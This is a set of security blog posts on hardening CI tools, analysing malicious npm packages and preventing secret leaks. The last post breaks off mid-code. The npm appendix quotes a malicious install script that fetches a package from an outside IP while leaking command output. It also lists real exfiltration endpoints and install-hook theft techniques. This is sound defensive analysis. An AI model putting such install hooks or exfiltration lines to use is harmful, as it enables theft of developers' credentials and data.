
Strengthen Your Shift-Left Security Foundations: Best Practices for Securing Your CI Tools

Shift-Left Security with CI Tools

Emphasizing early detection and mitigation of security issues within the software development lifecycle, the shift-left security approach is crucial in addressing the increasing complexity of security, which spans from local infrastructure to cloud environments. In many organizations, this approach has become a benchmark for assessing the reliability and maturity of the Software Development Life Cycle (SDLC). Continuous Integration (CI) tools play a pivotal role in implementing and reinforcing shift-left security practices, as comprehensive CI tools integrate and automate various security tests, from container scanning to secret scanning.

Securing CI tools can be challenging, and mishandling the process risks triggering serious security incidents. This is particularly critical because CI tools have access to a variety of resources, ranging from source code and databases to secret stores.

Best Practices to Secure your CI tools

Consider the following best practices crucial for safeguarding your CI tools and fortifying your shift-left security foundation. They fall into three categories: securing the infrastructure configuration of your CI tools, implementing robust access control for your CI tools, and treating CI scripts with the same level of importance as your production code.

Securing the Infra Configuration of Your CI Tools

Configuring your CI tools properly during deployment is a crucial step in ensuring their security. Below are some common configurations that you should consider adhering to when deploying your CI tools:

Place Your CI Tools Behind a Gateway to Restrict Public Access

In most scenarios, CI tools are deployed within development environments to access resources throughout the Software Development Life Cycle (SDLC). Placing your CI tools behind a gateway ensures that only your organization has access to them.

Ensure the Container Images Used by Your CI Tools Are Secure

Ensuring the security of CI tools’ images is essential for maintaining the overall security of your Continuous Integration (CI) pipeline. Here are some practices to help ensure the security of CI tools’ images:

  1. Ensure that the base images used for CI tools come from reputable sources and have undergone security evaluations.
  2. Install only the necessary components and dependencies in the CI tool images. Avoid unnecessary packages and services to minimize potential security risks.
  3. Run container scans before deploying.

Securing communication between CI tools and other resources

Because CI tools must be granted access to different resources in order to set up the components for other tests, we need to ensure that communication between the CI tools and those resources is secure. For example, enforce HTTPS/SSL/TLS, use network segmentation to isolate the communication channels between CI tools and other resources, and add authorization layers between your CI tools and each resource.
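As a minimal sketch of enforcing the HTTPS requirement, a CI job could validate every resource endpoint it reads from configuration before connecting. The function name and endpoint below are illustrative, not part of any real CI tool's API:

```python
from urllib.parse import urlparse

def assert_secure_endpoint(url: str) -> str:
    """Reject any resource endpoint that is not served over HTTPS.

    A hypothetical guard a CI job could run before talking to a
    resource (artifact store, secret manager, database API).
    """
    scheme = urlparse(url).scheme.lower()
    if scheme != "https":
        raise ValueError(f"insecure scheme {scheme!r} for endpoint: {url}")
    return url

# Usage: wrap every endpoint the pipeline reads from configuration.
assert_secure_endpoint("https://artifacts.example.internal/upload")
```

Wrapping endpoints this way fails the pipeline fast instead of letting a misconfigured plain-HTTP URL silently leak traffic.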

Modifying default credentials for improved security

Some CI tools ship with default configurations, such as default credentials. To remove the default credentials in your CI tools, identify the configuration files or settings where default credentials are specified. These might include configuration files for applications, databases, or any system requiring authentication.
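As a rough sketch of this identification step, a script could scan configuration files for well-known default passwords. The default list and key names below are illustrative; extend them with the defaults documented for your specific CI tool:

```python
import re

# Common factory-default secrets; purely illustrative — extend with the
# defaults documented for your specific CI tool.
DEFAULT_SECRETS = {"admin", "password", "changeme", "default"}

def find_default_credentials(config_text: str):
    """Return config lines that still assign a well-known default password."""
    hits = []
    for line in config_text.splitlines():
        m = re.match(r"\s*(password|passwd|secret)\s*[:=]\s*(\S+)", line, re.I)
        if m and m.group(2).strip("'\"").lower() in DEFAULT_SECRETS:
            hits.append(line.strip())
    return hits
```

Running such a check against every configuration file before deployment catches credentials that were never rotated away from their defaults.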

Implement Robust Access Control to CI tools

Once we have set up secure deployment environments for our CI tools, we need to implement robust access control. There are two key aspects to consider: the first is restricting who can access your CI tools and how that access is granted; the second is limiting the resources that your CI tools themselves are authorized to access.

Restrict access to your CI tools

Follow the principle of least privilege by granting users and systems the minimum level of access required to perform their tasks, and avoid assigning overly permissive roles. For example, a developer should be able to view test results in the CI tools but should not be granted permission to change and deploy the CI scripts running in them, and administrators should at a minimum use MFA when accessing the CI tools. Define roles based on job responsibilities, ensuring that each role has the necessary access without unnecessary privileges.

Restrict the resources your CI tools can access

As previously mentioned, CI tools have access to a diverse range of resources, including source code, databases, and secret storage. It is imperative to establish accurate and granular role assignments and access controls for CI tools to prevent the assignment of overly permissive roles.

In certain incidents, security breaches targeting CI tools have demonstrated the potential for bad actors to exfiltrate production data. This occurs when CI tools designed to access only sample data in development or test environments are granted IAM roles with permissions beyond what is strictly necessary.

To address this, consider the following best practices for restricting CI tool access:

  1. Apply the principle of least privilege to the CI tools themselves to limit what they can access.
  2. Add an authorization layer between the CI tools and each resource.

For example, if you deploy Jenkins in your cloud environment, you should define a proper IAM policy for the role that the Jenkins instance assumes, and in that policy you should allow only the necessary actions.
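A least-privilege policy for such a role might look like the following sketch, expressed here as a Python dict for readability. The bucket name and actions are illustrative; grant only what your pipelines actually use:

```python
import json

# A minimal sketch of a least-privilege IAM policy for a Jenkins
# instance role. The resource ARN and action list are illustrative
# assumptions — scope them to what your pipelines actually need.
jenkins_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:PutObject"],
            "Resource": "arn:aws:s3:::example-ci-artifacts/*",
        }
    ],
}

print(json.dumps(jenkins_policy, indent=2))
```

The key point is the absence of wildcard actions: the role can read and write pipeline artifacts in one bucket and nothing else.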

Consider CI Scripts with the Same Level of Importance as Your Production Code

After you set up secure deployment environments for your CI tools and grant them proper access control, you will start writing CI scripts to integrate the different tests (regression, feature testing, and security testing) under your CI tools.

In numerous instances, CI scripts are authored by operations engineers or DevOps teams rather than developers. This can lead to certain security checks being less stringent, as these CI scripts are perceived as internal code. Because of this misperception, many security issues can be introduced through your CI scripts. To ensure that your CI scripts adhere to the same security standards as your production code, it is advisable to add the following security checks.

Implement Security Reviews and Peer Reviews to review CI Scripts

Establish clear guidelines and roles for security reviews, involving diverse teams in collaborative discussions to assess code against coding standards and security best practices. 

Activate All Automated Security Scanning Tools to scan CI scripts

Enable security scanning tools, such as dependency scanning (SCA), secret scanning, SAST, and SBOM generation, against your CI scripts to proactively identify vulnerabilities during the early stages of the SDLC. After enabling these automated scans, it is crucial to enforce action when they detect potential security issues. One common problem we have observed is the absence of action items even when the automated scans identify valid security concerns.
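As a toy illustration of what a secret scanner looks for in CI scripts, consider the sketch below. The two patterns are illustrative only; real scanners ship far larger rule sets:

```python
import re

# Illustrative patterns only — real secret scanners maintain hundreds
# of rules covering many credential formats.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic_token": re.compile(
        r"(?i)(api[_-]?key|token)\s*[:=]\s*['\"][A-Za-z0-9_\-]{16,}['\"]"
    ),
}

def scan_ci_script(text: str):
    """Return the names of secret patterns found in a CI script."""
    return sorted(name for name, rx in SECRET_PATTERNS.items() if rx.search(text))
```

Failing the pipeline whenever this returns a non-empty list is one simple way to turn a scan finding into an enforced action item.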

Conduct Regular Security Audits and Updates 

Perform routine security audits and updates alongside enabling comprehensive security scans during CI script commits. Regular audits are essential to maintain system currency and address security issues stemming from legacy code. For instance, a vulnerable dependency library within your CI scripts could be identified and addressed through these audits.

Establish Robust Monitoring and Logging

Similar to production code,  it is important to enhance monitoring and logging for CI scripts, integrate logging directly into scripts, define key metrics for tracking, and leverage built-in tools from your CI/CD platform. Centralize logs for comprehensive analysis, set up alerts to receive immediate notifications for critical events, and regularly review logs for early issue detection. 
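A minimal sketch of structured logging inside a CI script, so a centralized collector can parse and alert on it. The stage name and log format here are illustrative assumptions:

```python
import logging
import sys

# Structured, timestamped log lines that a centralized collector can
# parse; the format and stage name are illustrative.
logging.basicConfig(
    stream=sys.stdout,
    level=logging.INFO,
    format="%(asctime)s %(levelname)s ci-step=%(name)s %(message)s",
)
log = logging.getLogger("deploy")

log.info("starting deployment stage")
log.warning("artifact checksum mismatch, retrying")  # candidate for an alert rule
```

Emitting a consistent `ci-step=` field makes it easy to define key metrics (e.g., warnings per stage) and alert rules in the log backend.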

Conclusion

In conclusion, as technology evolves, the role of CI tools becomes increasingly crucial in shaping your shift-left security stance and ensuring the integrity and security of software development processes. Fortifying the foundations of shift-left security for CI tools is paramount in establishing a proactive and resilient security posture within your organization. Emphasizing robust access controls, secure configurations, and regular updates serves as a solid defense against potential threats. By following the best practices outlined in this guide, your organization can effectively mitigate risks, identify vulnerabilities early in the development lifecycle, and cultivate a culture of heightened security awareness.

What is behind the NPM malicious packages?

An analysis of 100 malicious NPM packages 

Background

The practice of attackers publishing malicious NPM packages to the npm registry for the purposes of stealing sensitive information or launching supply chain attacks is not a new phenomenon. Every month, hundreds of malicious packages are detected and reported by security companies. For example, the Snyk vulnerability DB adds hundreds of malicious npm packages every month.

To ascertain the objectives of these malicious packages, I began extracting the source code of the 104 most recently listed malicious packages in the Snyk vulnerability DB (the list may no longer be the latest, as the process started at the beginning of April), with the aim of closely examining the activities the packages are designed to perform and how they launch their malicious activities.

Key Findings from the Analysis

Upon completion of the analysis, the results were unexpected, with both positive and negative aspects that can be gleaned from the findings. The Appendix provides details of the analysis of these malicious packages, including the package name, source code, and the malicious activity executed by each package. Here are the primary findings drawn from the analysis.

  • Key Finding 1: More than 95% of malicious packages are created for POC purposes
  • Key Finding 2: DNS data exfiltration and data encryption are used to steal collected data
  • Key Finding 3: Stealing Discord tokens and environment variables remains a key motivation for malicious packages
  • Key Finding 4: AI is a valuable tool for detecting and analyzing malicious packages
  • Key Finding 5: 70% of malicious NPM packages send collected data over HTTPS requests
  • Key Finding 6: 99% of the malicious packages execute at install time

Key Finding 1: More than 95% of malicious packages are created for POC purposes

One of the significant discoveries was that over 95% of the malicious packages were created for the sole purpose of Proof of Concept (POC) demonstration by security researchers or bug bounty hunters. 

The packages analyzed were found to collect system information, including non-sensitive data such as the OS platform, hostname, username, current path, and public IP address, which does not pose an immediate threat. Of the packages examined, the majority were developed for POC demonstrations. It is surprising that security researchers are saturating the npm registry with so many packages, and it is unclear whether this is beneficial or detrimental to security.

Key Finding 2: DNS data exfiltration and data encryption are used to steal collected data

To ensure the data collected by the malicious code is harvested by the attacker, we found that DNS data exfiltration and data encryption are used when sending collected data to attacker-controlled destinations.

The use of DNS as a means of data exfiltration is becoming more common among attackers, as many security products now perform well at detecting malicious activity over TCP protocols. During the analysis, we saw a couple dozen malicious packages using DNS data exfiltration to steal sensitive data.
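A common heuristic for spotting DNS exfiltration on the defender's side is to flag hostnames with unusually long, high-entropy labels, since encoded data tends to look random. A rough sketch, with illustrative thresholds that would need tuning against real traffic:

```python
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy of a DNS label, in bits per character."""
    counts = Counter(label)
    total = len(label)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def looks_like_dns_exfiltration(hostname: str,
                                max_label_len: int = 30,
                                entropy_threshold: float = 3.5) -> bool:
    """Heuristic sketch: long, high-entropy labels often carry encoded data.

    The thresholds are illustrative assumptions, not tested defaults.
    """
    for label in hostname.split("."):
        if len(label) > max_label_len and label_entropy(label) > entropy_threshold:
            return True
    return False
```

Real detection systems combine this with query volume, label count, and allow-lists, since legitimate CDN hostnames can also look random.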

Another way to hide malicious activity, discovered while analyzing the packages, is to encrypt the collected data before sending it over HTTPS requests.

Key Finding 3: Stealing Discord tokens and environment variables remains a key motivation for malicious packages

Based on our analysis, stealing Discord tokens and sensitive environment variables (login credentials, system and network data) remains a key motivation for creating malicious packages.

In addition to stealing Discord tokens and environment variables, the other motivations for creating and distributing malicious packages that we identified are running cryptocurrency miners or ransomware and using the packages to create botnets for use in other malicious campaigns.  

We also noted that attackers are very likely to use a combination of methods to achieve their goals. In one of the packages analyzed (ul-mailru), we found that the package uses a nodemailer function to send email in addition to stealing system environment variables.

Key Finding 4: AI is a valuable tool for detecting and analyzing malicious packages

The obfuscation techniques used in malicious NPM packages can make it difficult for security researchers or software developers to read and understand the intention of the code, as obfuscated code is not really human readable. However, using AI-powered tools like ChatGPT to deobfuscate the code made it possible to accurately deobfuscate the malicious packages and quickly analyze their intentions. I was frankly shocked by how accurately and quickly ChatGPT could deobfuscate some obfuscated malicious packages when I first used it to analyze one (not among the 100 packages analyzed).

Besides deobfuscating the packages, I used ChatGPT to double-check the code of the malicious packages to ensure a comprehensive analysis, and ChatGPT was able to find more data than my own analysis did.

This highlights the capability of AI-powered tools like ChatGPT to assist in the detection and analysis of malicious packages.

Key Finding 5: 70% of malicious NPM packages send collected data over HTTPS requests

With more and more security products deployed in critical environments to monitor suspicious traffic, sending sensitive data over HTTPS requests or other TCP protocols can be detected relatively easily by these security tools.

It is therefore surprising that more than 70% of the analyzed packages still use HTTPS requests to send collected data. Many malicious packages use Pipedream to create a webhook and deliver the collected data through it.

Key Finding 6: 99% of the malicious packages execute at install time

A noteworthy discovery is that 99% of the examined packages execute their malicious code via the “preinstall” and “install” scripts specified in the package.json file during package installation. This means that upon running “npm install malicious-package” in your terminal, the malicious code is activated regardless of whether you ever actually use the package.

Because of this specific pattern, it might be easy for automation tools to analyze the package.json file to detect malicious packages. For developers, checking the package.json file for suspicious scripts can help mitigate the risk of installing a malicious package.
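A toy sketch of such an automated check, flagging install-time scripts that contain commands a legitimate package rarely needs. The hook names come straight from the npm lifecycle; the token list is an illustrative assumption:

```python
import json

# Install-time lifecycle hooks that npm runs automatically.
SUSPICIOUS_HOOKS = ("preinstall", "install", "postinstall")
# Tokens a legitimate package rarely needs at install time; purely
# illustrative — real tooling should use a richer rule set.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "node -e", "http://", "nslookup")

def flag_install_scripts(package_json: str):
    """Return (hook, script) pairs whose install-time scripts look suspicious."""
    scripts = json.loads(package_json).get("scripts", {})
    return [
        (hook, cmd)
        for hook, cmd in scripts.items()
        if hook in SUSPICIOUS_HOOKS
        and any(tok in cmd for tok in SUSPICIOUS_TOKENS)
    ]
```

A developer can run the same check by hand: open package.json before installing and look at what the preinstall/install/postinstall scripts actually do.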

Conclusion

In conclusion, here are some key takeaways from the analysis:

  • Because the cost of publishing a malicious npm package is very low, the threat of malicious packages continues to evolve. It is important for the NPM community to take proactive measures to improve the security of the NPM ecosystem.
  • The sophisticated techniques employed by attackers, such as code obfuscation, encryption, and DNS data exfiltration, show the need for advanced security tools that can detect and prevent such attacks.
  • Considering the huge number of malicious packages published daily and the specific patterns most of them use, integrating AI into security tools could be a good option for combating malicious packages.

However, it is important to note that the analysis only represents a tiny portion of the malicious packages published daily, and there may be many more undiscovered malicious packages in the wild. 

Appendix

Package Name | Malicious Activity | Source Code | NOTE
--- | --- | --- | ---
mathjs-min | Steal Discord token when a user performs the squrt_num operation | Link | Malicious package
w00dr0w-test | 1. Perform a combination of system and network reconnaissance. 2. Send the collected data to a remote server via DNS lookup queries after setting DNS server 3.145.70.183 | Link | POC
cirrus-matchmaker | 1. Collect system information and send it to eo6aglyemjbsegf.m.pipedream.net through HTTP request. 2. Write a file on the local system | Link | POC
pixelstreaming-sfu | 1. Collect system information and send it to eo6aglyemjbsegf.m.pipedream.net through HTTP request. 2. Write a file on the local system | Link | POC; same as cirrus-matchmaker
usaa-select | 1. Perform a combination of system and network reconnaissance to collect data. 2. Send the collected data to a remote server via DNS lookup queries to DNS server 3.145.70.183 | Link | POC; same as w00dr0w-test
stripe-firebase-extensions | 1. Collect system information and send it to eo6aglyemjbsegf.m.pipedream.net through HTTP request. 2. Write a file on the local system | Link | POC; same as cirrus-matchmaker
firestore-stripe-payments | 1. Collect system information and send it to eo6aglyemjbsegf.m.pipedream.net through HTTP request. 2. Write a file on the local system | Link | POC; same as cirrus-matchmaker, same author
usaa-slider | 1. Perform a combination of system and network reconnaissance to collect data. 2. Send the collected data to a remote server via DNS lookup queries to DNS server 3.145.70.183 | Link | POC; same author as w00dr0w-test
int_stripe_sfra | 1. Collect system information and send it to eo6aglyemjbsegf.m.pipedream.net through HTTP request. 2. Write a file on the local system | Link | Same as cirrus-matchmaker, same author
ul-mailru | 1. Use the nodemailer library to send an email via an SMTP server hosted on the domain kedrns.com. 2. Collect the system environment variables and send the data to eod8iy0mxruchl8.m.pipedream.net | Link | Malicious
stats-collect-components | Collect system information and send it to a Burp endpoint through HTTP request | Link | POC
github-repos-searching | Install another malicious file through the package.json preinstall scripts: `"install": "npm install http://18.119.19.108/withouttasty-1.0.0.tgz?yy=`npm get cache`;"` | Link | Malicious
parallel-workers | Collect system information, like hostname, DNS server, and username, and send the collected data to https://eot8atqciimlu9t.m.pipedream.net through HTTP request | Link | POC
hoots-lib | Collect system information and the AWS credentials of the instance (if it is running on EC2) and send them to a Burp endpoint through HTTP request; steal environment variables and send them to a remote host | Link | Malicious
tiaa-web-ui-core | Collect system information such as the hostname, type, platform, architecture, release, uptime, load average, total memory, free memory, CPUs, and network interfaces and send it to a remote web server through HTTP request | Link | POC
dvf-utils | Collect system information and send it to the specified URL through HTTP request | Link | POC
owa-trace | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC
owa-fabric-theme | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
solc-0.8 | Collect system information and send it to the specified URL through HTTP request | Link | POC; same as dvf-utils
@exabyte-io/chimpy | Source code: https://socket.dev/npm/package/@exabyte-io/chimpy/files/2023.3.3-3/ | Link | Not sure
owa-theme | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
egstore-suspense | 1. Collect system information and all the packages installed under the project. 2. Send the collected information through HTTP request | Link | POC
clientcore-base-businesslogic | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
owa-sprite | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
clientcore-onesrv-serviceclients | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
testenbdbank | 1. Collect system information and environment variables, like IP address, hostname, and the content of the /etc/passwd file. 2. Send the collected data through HTTP request | Link | POC
teams-web-part-application | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC
clientcore-onesrv-businesslogic | 1. Collect system information and environment variables, like an API key, then make an API request to pull user data. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC
@exabyte-io/wode.js | Not clear why it is marked as malicious | Link | Not sure
cp-react-ui-lib | Collect /etc/passwd and send it to a remote server over HTTP using preinstall scripts defined in package.json | Link | POC
onenote-meetings | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
ifabric-styling-bundle | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
seafoam-desktop | Collect system information and send it to the specified URL through HTTP request | Link | POC; same as dvf-utils
odsp-shared | Collect system and network information and send it to a server through HTTP request | Link | POC
@exabyte-io/made.js | Not sure why it is marked as malicious | Link | Not sure
clientcore-models-catalyst | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
clientcore-catalyst-businesslogic | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
cms-businesslogic-extensions | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
egstore-query | 1. Collect system information and all the packages installed under the project. 2. Send the collected information through HTTP request | Link | POC; same as egstore-suspense
teams-calendar-web part | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
cms-businesslogic | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
npo-common | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
egstore-ctx | 1. Collect system information and all the packages installed under the project. 2. Send the collected information through HTTP request | Link | POC; same as egstore-suspense
office-fluid-container | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
globalize-bundle | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
cms-serviceclients | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
@clearing/models | Collect system information and send it to the specified URL through HTTP request | Link | POC; same as dvf-utils
devcenter-internal-stable | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
kol-demo | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | Same as teams-web-part-application
clientcore-base-serviceclients | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
cms-ui-presentationlogic | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
cms-models | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
cms-serviceclients-extensions | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
devcenter-internal-beta | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
cms-external-datajs | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
cms-typed-promise | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
cms-ui-views | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
sp-image-edit | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
catalog-container | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
follow-ebay | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
sp-yammer-common | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
package-private-16 | Run a DNS query to collect system information | Link | POC
cms-ui-redux | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
owa-strings | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
core-site-speed-ebay | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
fluent-ui-react-latest | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
sp-home-core | Gather information about the system (hostname, network interfaces, system path, username, and current package) and send it to a specified URL using an HTTP GET request | Link | POC; same as teams-web-part-application
ts-infra-common | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
react-advanced-breadcrumbs | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
cyclotron-svc | Collect system information and send it to the specified URL through HTTP request | Link | POC; same as dvf-utils
react-screen-reader-announce | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
canopy-common-fo | 1. Collect system information and environment variables, like IP address and hostname. 2. Send the stolen data using DNS lookup data exfiltration | Link | POC; same as owa-trace
ing-feat-customer-video | Collect system information and send it to the specified URL through HTTP request | Link | POC; same as dvf-utils
ing-feat-chat-components | Collect system information and send it to the specified URL through HTTP request | Link | POC; same as dvf-utils
commerce-sdk-react | Collect system information and encrypt it; send it to a remote server with HTTP request; create a local file | Link | POC
internal-lib-build | Collect system information and encrypt it; send it to a remote server with HTTP request; create a local file | Link | POC; same as commerce-sdk-react
woofmd-to-bemjson | Collect system information using the preinstall command in the package.json file | Link | POC; same as postcss-file-match
@geocomponents/reducers | Collect system information and send it to the specified URL through HTTP request | Link | POC
rimg-shopify | Collect system and network information; encrypt the collected information and send it through HTTP request | Link | POC
postcss-file-match | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC
yandex-net | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
branch-to-cmsg | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
yappy_ts | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
taxi-localization | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
staff-www | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
hermione-login-plugin | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
tools-access-lego | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
express-tvm-nodejs4 | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
y-font-decoder | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
lego-stuff | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
express-yandex-send-limit | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
borschik-webp-internal | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
supchat-plugins | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC; same as postcss-file-match
bemhint.i18n | Collect system information and send it through an HTTP request using the preinstall command defined in the package.json file | Link | POC
Same to postcss-file-match
yandex-cssformat Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
portal-node-loggerCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
toolbox-bem-bundleCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
y-dotCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match
yandex-bro-embedded-site-apiCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
tanker-ts-i18nCollect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
fiji-svg-spriteCollect system information and send it through a HTTP request by using preinstall command defined under package.json file 
LinkPOC
Same to postcss-file-match 
karma-jasmine-i-global Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOCSame to postcss-file-match 
yandex-logger-std Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
pdb-uatraits Collect system information and send it through a HTTP request by using preinstall command defined under package.json file LinkPOC
Same to postcss-file-match 
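All of the preinstall-based packages above abuse the same npm mechanism: any command listed under scripts.preinstall in package.json runs automatically during npm install. As a rough illustration, a defensive helper (hypothetical, not part of the original report) could flag manifests that declare install-time hooks:

```javascript
// Hypothetical helper: flag npm packages that declare install-time
// lifecycle scripts (preinstall/install/postinstall), the hooks the
// packages above abuse to run code during `npm install`.
function findInstallHooks(packageJson) {
  const risky = ["preinstall", "install", "postinstall"];
  const scripts = packageJson.scripts || {};
  return risky.filter((name) => name in scripts);
}

// Example manifest shaped like the malicious packages described above
// (the package name and script are made up for illustration).
const manifest = {
  name: "some-package",
  version: "99.9.9",
  scripts: {
    preinstall: "node collect.js", // runs automatically on `npm install`
    test: "jest",
  },
};

console.log(findInstallHooks(manifest)); // → [ 'preinstall' ]
```

Running such a check over a lockfile's dependency tree before installation is one cheap way to spot packages that want to execute code at install time.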

5 typical ways engineers leak sensitive information and how to mitigate them

Background

From the AWS incident in which an engineer leaked private keys to a public GitHub repo, to the credential leakage through the online API testing tool Postman, it is clear that engineers can be the weak link in the system when it comes to critical sensitive data leaks.

By learning from publicly disclosed incidents, from penetration testing experience, and from security monitoring programs I have participated in, we can classify the common ways an engineer leaks sensitive information into five areas.

Different Ways in Which Engineers Can Cause Sensitive Data Leakage

Sensitive Data Leaks in a GitHub Repo

The mistake many developers make is storing secrets in their source code and checking them into source control tools such as GitHub and GitLab. According to the latest GitGuardian report, 5.5 out of every 1,000 commits exposed at least one secret, and 1 in 10 authors exposed secrets in a GitHub repo.

You may argue that the security risk is manageable if these repos are private and only a few developers in your organization have access to them, even though this is still a poor security practice. The incident experienced by Uber shows how bad things can get even when secrets live in a private repository: an attacker was able to access an S3 bucket with 57 million records of user data after extracting AWS credentials from a commit in a private repo. The worst-case situation is mistakenly pushing secrets-containing code into public repositories, under either an enterprise or a personal GitHub account.

Mitigation

  1. Train engineers not to send company-related information to a public repo
  2. Enable secret scanning in your CI/CD pipeline
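To make point 2 concrete, here is a minimal sketch of what a CI secret-scanning step does under the hood. The two patterns are illustrative examples only, not a production rule set:

```javascript
// Minimal sketch of a secret scanner a CI/CD step could run over
// changed files before a PR is merged. Patterns are illustrative.
const SECRET_PATTERNS = [
  { name: "AWS Access Key ID", regex: /AKIA[0-9A-Z]{16}/ },
  { name: "Generic API key assignment", regex: /api[_-]?key\s*[:=]\s*['"][A-Za-z0-9]{16,}['"]/i },
];

// Return the names of all patterns that match the given text.
function scanForSecrets(text) {
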